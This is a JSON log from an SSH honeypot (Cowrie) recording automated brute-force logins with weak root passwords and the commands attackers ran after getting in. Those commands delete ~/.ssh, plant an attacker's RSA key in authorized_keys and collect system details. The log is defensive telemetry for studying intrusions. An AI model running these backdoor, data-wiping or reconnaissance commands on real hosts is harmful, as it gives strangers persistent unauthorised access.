{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:04:03.580809Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:04:03.581597Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43628,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0f11888f940","protocol":"ssh","message":"New connection: 212.227.235.229:43628 (1.2.3.4:22) [session: e0f11888f940]","sensor":"my-vps","timestamp":"2025-08-31T05:04:05.432263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:05.432967Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:05.515501Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:04:05.537257Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4.","message":"login attempt [root/Q1w2e3r4.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:04:05.888946Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:04:06.069896Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.070700Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.071673Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.155634Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:04:06.738569Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.739113Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.739980Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.741200Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.742445Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.743260Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.744425Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.746604Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.747095Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.747617Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.748061Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.748644Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.749347Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:04:06.854787Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.855485Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.940214Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:06.941061Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43632,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f327c85d481","protocol":"ssh","message":"New connection: 212.227.235.229:43632 (1.2.3.4:22) [session: 7f327c85d481]","sensor":"my-vps","timestamp":"2025-08-31T05:04:07.042690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:07.043606Z","src_ip":"212.227.235.229","session":"7f327c85d481"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:07.135339Z","src_ip":"212.227.235.229","session":"7f327c85d481"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:04:07.187233Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:07.189178Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:07.190585Z","src_ip":"212.227.125.160","session":"8ae3f8dfb176"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:04:07.545947Z","src_ip":"212.227.235.229","session":"7f327c85d481"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:08.639375Z","src_ip":"212.227.235.229","session":"7f327c85d481"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43638,"dst_ip":"1.2.3.4","dst_port":22,"session":"15440fad97e1","protocol":"ssh","message":"New connection: 212.227.235.229:43638 (1.2.3.4:22) [session: 15440fad97e1]","sensor":"my-vps","timestamp":"2025-08-31T05:04:08.712053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:08.712949Z","src_ip":"212.227.235.229","session":"15440fad97e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:08.795062Z","src_ip":"212.227.235.229","session":"15440fad97e1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:04:09.168368Z","src_ip":"212.227.235.229","session":"15440fad97e1"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:09.251981Z","src_ip":"212.227.235.229","session":"e0f11888f940"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:09.252978Z","src_ip":"212.227.235.229","session":"15440fad97e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51098,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c068d8b1e5d","protocol":"ssh","message":"New connection: 212.227.235.229:51098 (1.2.3.4:22) [session: 0c068d8b1e5d]","sensor":"my-vps","timestamp":"2025-08-31T05:04:17.414252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:17.415391Z","src_ip":"212.227.235.229","session":"0c068d8b1e5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:17.538518Z","src_ip":"212.227.235.229","session":"0c068d8b1e5d"}
{"eventid":"cowrie.login.failed","username":"middleware","password":"Password123!@#","message":"login attempt [middleware/Password123!@#] failed","sensor":"my-vps","timestamp":"2025-08-31T05:04:18.063590Z","src_ip":"212.227.235.229","session":"0c068d8b1e5d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:04:19.190695Z","src_ip":"212.227.235.229","session":"0c068d8b1e5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39554,"dst_ip":"1.2.3.4","dst_port":22,"session":"531a8cdfd2ee","protocol":"ssh","message":"New connection: 212.227.235.229:39554 (1.2.3.4:22) [session: 531a8cdfd2ee]","sensor":"my-vps","timestamp":"2025-08-31T05:04:19.523667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:04:19.524719Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:04:19.786505Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.login.success","username":"root","password":"server@2021","message":"login attempt [root/server@2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:04:20.867082Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:04:21.404776Z","src_ip":"212.227.235.229","session":"531a8cdfd2ee"}
